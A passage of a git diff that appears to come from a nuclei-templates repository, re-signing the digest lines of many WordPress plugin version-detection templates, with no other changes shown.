4a0a0047304502201a10caf2b1db1d58dc1a90499e81800515b45da57d76287222f1c949f16a2f64022100d5d50334c9765dc26d3de5f2e1beef81cac9cd8ed748f230db2369d1d3e1e6aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 5ab20b1477..e683b5659c 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204b6012f6b8bfa1c6a99c248010c43eac83bd155b5bd3895b5efd30940ef525ae022100b4cd1307908cebf3584ddc84cb9192cf069f3065834f94f14d8fcbb9fc9dc8a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100825aa3c2d4cc3481fff733a7c45d77463f41a5cb59421e8081494798598a7b98022100feb310ac9413e4a79e1306d4c465c76bd145edec3bc4f5f6a08da30354fcb32c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index ed9676d822..b24f170b7b 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205a2755903f8c81eb962f6dac8945d2c10f4f307008ea312b21673d2c794fa3a4022100e9b4c9e2b36b386e671e8d97a3a27e45cb32dd84f790c9e3ce0591f45202c2fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206a895f37eb9e6a636b1603decbadc29a4a801d43b366b2ae567199ff10db0f0e022100de515e36c3ae8a188a35f813e71c75068d03a789c6bc03d7f178914dba6c601c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 8917076568..dd91a41cf4 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220320a03863c194e469534f61be9f85a1c5a69f8d703950b5c14ef4e64fbe1f9ef022100c4338ea6f70144ebdeec7a3e69c7bbef1019df6b52ef1b21ecd9f3a2d19215ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057367284520d1036c36e6501257451750be09ed245c38f5e940e3a636536d3ce0221009a0835082833a7d1312da90d574d164116821d4cf7253f8e26b894d24d8d0082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index dc2d740f00..c63902d214 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e34245f480b6036ac5772493ffd112627c2e95802587ade2a6f295960a16ee1b022100d2016515fef570512d2292119e43937a4e38c01a708340c70eb220e8f53eec55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206710d13df858fe3234cbc0c1d8a404fa662d24b741d88d3acda08c5060bb9e87022016557bbe23a1df321f0c608139490112727d4dcf0e87eeee0fb726de681f9006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 5ecf0d8720..d6dc447574 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220583fe0572fd2e668d74c4833027cc715c344ab4e9b5e722d366d59c8b8e63d5202201c415e1cb3b104dffb603a65e45672e5ef7b54bd23dd89aa36b9dbcad5a1d4ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c82392278ea49244be09c53191cca769e78f7519a89f125fcedd4538087301e0022100f5ee68ca7ea538c19a6eccf0728e5495e919e3a6fb2674183874a80cbe754afd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index ef1c8cbe89..ece0824cc3 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a590b5c442250a0898978b03480ad6dd24de0ebef980141e072c9271a96ce65c022016a8a97be537df76bc02b5d260d1bf2355f4511802aba5633874f0a90fafb99d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043eb5f71e03f990929fcddccf0cba84a4322308ceea693e050380b7768c07f2602207b6406af2911684c50737d146505a80bc56a2aea96a9dfa92d8d5bf3ad2a35f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 2fe69b6c76..761bdfb856 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220106be2a9d1cb98939f2e5d2e982f14fc1bfd3f0f64dda79bd60df80eb1aa3dbd022100ab6238b48740ce3628ad00a5dfc39a981712ff4917a3689ca2ea4bc4d771dd17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206a3f9b0af53ffa78eb6bacb00e0959d6624789c67d6bd1791e1ea978100bc7f802210089c3875ca0b55cc85ac03964a41fffe56a4dfa72a033478297d43be131368898:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 5978e969cb..581a55c1e8 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a4562ab7f0bfbbfc65f3eedd4d90d1f069ab8bc7e301859fc0ef2c0ce18baa36022100b179573564f0bc20b7e43b3240d550818778082d06a209015da0932da86a5c33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100845f3cb6addcb950e3adf12c58dabaf9dd2b8a9409697fee1fa2e8c4231f3091022065c736fcbea7677fb781cc3e7bfeed9f35323d958ec3e194b2fc25c548309df4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index f611324c95..6e1eb3f4b4 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201d39fa069c2cff4ae6e5b68c38247e317fbb47be0646a4e2c3ec52efc7dcac5c02210097de9432d77f4d030ba80cc7c00b99eeb3206b56548d885df18438af00ff0292:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202742895a0e0aaeacb4c23047be6231bb6c51a4bac0124d8e504d3b007eb2bd3c022073db169eea96ef65c062545cb88637859c38ae16c871ac706474c33d14a2347e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index c1a0de3707..294469f9fa 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220488f351ebfc7f8f1a990b4bc54c4980fbe7ac353fe6cd92dacb65e3d5929072e022100ad8f887bc87c4bc7fd892bc39df1edd2dde5ef989aeba46c6959afbeb640c30a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b7f5de7aafd6e2953a346c531b7c4c48b89b75f62f812dd2444947d22d9f2e4e022100c84141929dd93143eec7abd4ea11bdd07db66c1e0aa02447d47ffd7d71a9cbd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index 0daa4bbef5..6f0ca030eb 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d370a8f0fdf4f76c4ba6fad037d330441c38b352144cafc7956631e189402b7b02205550b3e2753b119a3efad82483d66954fc2b66728de5e973702f81152eb7f58c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbf03c0a89e9e8fa84ee826063903c635a960f22af2459e06b576fb7338ecfb1022100f5a64644b5f844e5499e99a8cd9769e7eab372f5a2adb14babeaac834ee49288:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6bf8e50eab..40e9f1932a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220442ed3cd96ab917942c18635589c279f57bfe103d45965fc303a1e760ea30b0b022100bad8e0c1c9b22e404b36922caede2798eb88a94ec681076f98e51102179a82bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cff92ceefd3979fb97c5a86b8f0ea25b5eea895cd3a8056fb74cc1ae840a606a022100f311be87aa132a22386acd31b2c3f7a7fa595810985d22bf50a4bdb4e0ced8a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index b58c923a0b..91e2d57d7c 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022055eca80547a7fe3b559e3886f78dc0e76a394198dfc882d2dbdb9dca53c13b82022048ac37e76722b30e4d8d3f57dd2905b135f80e1becf91319a1d19561c208e4db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a20fcc8ca86be6aaf985cbd22cbde70e8fdce3e227917e8cc66ce26f7b399d6302204f0defce16750a800ee15384c2c5e189f965ed1efddebd497577216d2f29165a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 00ee93f86b..5dc38e4f4e 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008bced3cecb75db02f91757777395dc44d92fadfb99f036564379caee778a40080220766c0845505ed3f8debe1809838d1294dbf974103177d8893cbdc8f1b90438f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203209661b4f405654f61570eedc2e16f7fd152c68ebc62fd242bbdad57ab2225f02200a390ce91659520dec2b1fd94df6b3a5ff8ea4f9f6f46f62f7d38fcb53344651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index b8a4aef80e..4b0dc21029 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022045c2a340d45e24a73c8ae3c102496fc0b96dba6624642337eadb1528e14c884b02200aac4bf8aee66abb3d4a6ca99aa0a8aa465dbb60ed84f31d61081fb54e8cf1d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c5dd56e3125e7567861b2f7fb625798e743cc3a2de2e28ea80028c233f78330c022100c94866e809da84f466bb44c0fbfd0d5be4ecf6a171b6a9d7b335a864642f561d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index f731a9a2c2..9817d1ab9d 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200cc7e32b66ca395f2c4da610e685a7b35dcb7886476425b6011e8a76832b5216022100e0aa841193287673f63d77c0d6e94301c92085b03fc4bea0838cf5fb9efd101f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a3c8634b0cd48d441b9358091f5324e06ccf6dc72157945789eaa1b7bbc453802205ac3adff6eda57e22ec82ffdac6f883f61b952b4c302db95b5d4559f9e0d7f05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a428558431..c45dc05482 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f9c0566ba3e482c7306ca9545869f4e8bd7a69654e3b8f092978af820934e87c0221008bb82252c79960775efbc92f52e8220e31cd9ea22ae906c4e21828f3a176ccef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009237fbfcef625fc110bb566112916b17ff2e402f1e3b904ae65febfe138046370220125a1b54d49dcdccdb2d7797a36fbf64ad8a6d09cdac5bf0f37b2f957614b7be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 405f3de4b0..19eb49c0db 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220700c04a39cdcc7f87f765d77db838d921fdfaf5e61bf8bfc858e0effcb48886c022100aabdf6d2a996983525e33800d36237e6432b92f663efcfce150300fddf0bbbf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e8bea1b66830b0f691f3f8675ffc4d22f5bb326e0862562c99786b96bf8814f022051f27042a2ababad8271b4d4f56c600e5672f42930356c97156ea4a30a104936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index e3c9ff6588..b8863a3a99 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f4515456cc2b3bd1f9e3e31f0bbf6e0932a55a996b0469835525811b2e28868d02202fd82b2d246296d4d269bcbccd6449dd767e4423106b94c959ddeb58bc79216d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203151a07d84ef6de4b902b896f55e44b32da51b5650612005038b99f7d5d69f85022100f6780664ee34f21c59c9e5e6c579f396fc3019cb1d125a1cc1e744e426144657:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index aa88a72703..3723623bda 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022007482590a90683436db632b7f93681b375f5f69a6d90a23ad1b46c4c692f3a910221008190b48ed0fa639edcc307bb6d34aac539ab55ba66413ae9c235c32fed6ec719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b428afdf218eb0c9102695bfdafb8184074ac68f421f4cc566eba1fa56cb695022100cb0884a52bae57498fb4cbbb1e199606615ace6875bacd6cbfa43a574ba70b21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 750bd926ed..8082afbb02 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220229a868ed4942b1c9082322a474436f806eaafa24ede9a792016b265f1549314022100a30c486c62f74396896fd2426c7e1fcfaad1a1b323ee5daef3c80fde89bf50cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205fe4267b0dd7dd2099c457feff531d33175bc5da96b82f6523e8335174ec6f2c0220141688b38e7d9048fb771a3aea6eb5aeab8b4c2d423d3b94bfbe834fe1871448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index a350f9d22a..91b683220e 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022069207d8d8316010ae671241dbac7cbcb91bab8c6fbe88513974d0f8bf4bb51840220455e14d8af7e1330b6b8e5d1968d79191a29605a86cbf5e426c83222a70b8155:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220353d42a2816fd039eebdb96a397ca773c6a8ee9c9e523a908b7250a0dc423b02022015e62256324704de57f1e573deaa3b1254043e5872f2c88799fc6193be516a52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index b0b164fc40..f61c5f9a47 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204f439ec88da74bc30587b4e460471c4884fa4cadab3494034e257e48f8af0bc902207c7461dd65c5ad836af9834bf30b8a96c099763899a17527b9b0d05990592078:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d7da340957e24e11db902667768b1ad5974ab0b4a0331b49fc3fb9ccf33d04b022017e351341eab54fa5460b373e33363bb3da08d249c4e83bf755d19db276e434d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index aaceda9d8b..d1d0148681 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100937fbc1cb34b138d6b3a7f48c528f4647a9f36a5a124e79e5c373af19c6cecff022100af53933a8d3db6ec16bfc4a421a879b0b3965ea666e9cefc0e2f8642858e620d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100909554a1771a6b987034e5e402d72e80b920849f7e634395f1c55eefe529b9570221008153dd194b98b8b5d7f3eb8661f54fac3d9dc7530f15444e2d096a6953757bf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 066fce2770..b026d7cae1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204d18f9601eb43396c54640c7c9713f7bdf029a064b3c502179e9c27f08f492a70221008aa88c290d37f2eae334e594973d5902ed0088c7baeac6a16a1e62dcc2027140:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db4ec90780ee11fc75db17ee8e923af31f0f4585ecd93b65656671cf6b5f73b902204b4590f25afed2bc132c0aa4c9e316c162ad5f1777668178b2078e0eaa7844d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index d590206c0c..2755ba817d 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207b2f7571568ec01ef57431c081a47c95f0724b6672a6ab8cdcc73fc9ccadb6ff022100eae9c0a744903511ec24c22ac6f1e0c3bc87181311afcbfcc2f0d3755d49725f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bc2d45c837b4fd0ccc04d8b7e1b4e7d80a067fa39b9aa3dc2197fa62ffbb9c540220330af90a141ab022ad98c8bc39e65244a2ebfb3d1d60a8b20787ce38497143e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 935559ea73..abbe7c1fe2 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f403e15f9e408fbab407b87397d48496bc4988dd2880b7a582b7ac18c39c5c000221008d4bf064b2359dc48bbd27c49e202219898fd9b5005e154e9c5c359a8c39fa07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce68ff3058e756b8608b149cc9f0c167125fb2d1b463ba220e8999e940baf70b02203dd409f8e9b5c3ebcd2b4e51de9e1e46c180a583a201e210d8999a4521fb77f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 2505bcae62..e0bf1097ff 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b2710584317b9aef441942ffedf7b321ce7af3587bcfee67cfe03e6666db37cc022055e7f1c5bdbb58a1dca8375009ead055001434df5d118d38523df0d0b8ab295c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e55becce2b693144633578089fdc114f52a836438e98e40ee8f905ceb3768117022073865377857b24f7fdb1f031806dbe89d64a0d9fee66bf6dedb2be20078a862a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 435073839d..0b2f3361a2 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203ad32e9d39f49803c4a82340a6f075b7b314d317e7e763583d14f0c1ddcfc9f202207dcdc9ab035a3f502331c5e0d5771ee3753e1ace44a2aec79064345024dc2755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d2f6d530b1c2989320c0acf9bc767a7c05c6f94eda500bd8a7dcfe333f04c92b02210085357766290af04e5e438375541935431bf4c38dfef88654d6c47241a8488cc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 166e5cf239..a1651f265f 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b9a10ff52e9b67c3398c89df449c9d1dd1c269c3daf5e665f25d70a99e0dbce10220164aa552cbac20c10e6e00fcdc2b4d7131e051eaafecc2a58e404a10da0e7fa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201368a70ecd17734907a3395380b9c01aafd067994a202fc4e4358310848971a70220711f2f5167c7f4c0a71114fcd1eba9196d2f860590b9aa8568a0887743b66ce2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index daa26db4f5..47598c4275 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c6dc4a60eb361b59e53c9f6f38904b7f1eca3c1cfd9ef3813bb549674a17e4610220236ea0d9792ded9faccea7ffcbd2f3019d813dadfebab6ba826e95638f0da97c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db07fa4e23bb93f129a3e80bbc1392a1857666a0a9873ee2f4f301a6a077d992022056d1523a9516f44747af50e530ca2f799808df3fa65a42482bcab680427d125c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 6ff3140e8b..9628a9d6a4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205cab80eb3abc748306b8261674ad9e17e6635392ad579cb7d9e578176a1021f102203bd1eb57b2de60dbd26cc27d5519952c24794c05938c9ed35cc3a225bc257896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032b12f4b32f3fd822e4791d115908af4ffaf05d455702ebb0314c94fd864f644022057de0155de94e19ae1bfcd97cb10f7a7b153477c5e41cc88030db94f83473053:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index f02a9a8208..4edadfe606 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fcbe8f28fc152fe6ab21b7b76d998dea796c341df75711348d5651ffbf43697f022079887bc457c00b9fff80fadc62914aebd8a94e546a9385d69f897bd1a0bfa030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ed2ecef33e1d9db3e0b355bf4cd76c2b58e07acbba8f4cc9bde122e50fffd600220712dfb38b977e67b8def13af36ef399a86fb89ab8533083ae49a53f28b1202f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index feb48cddb9..fdc6372de5 100644 --- 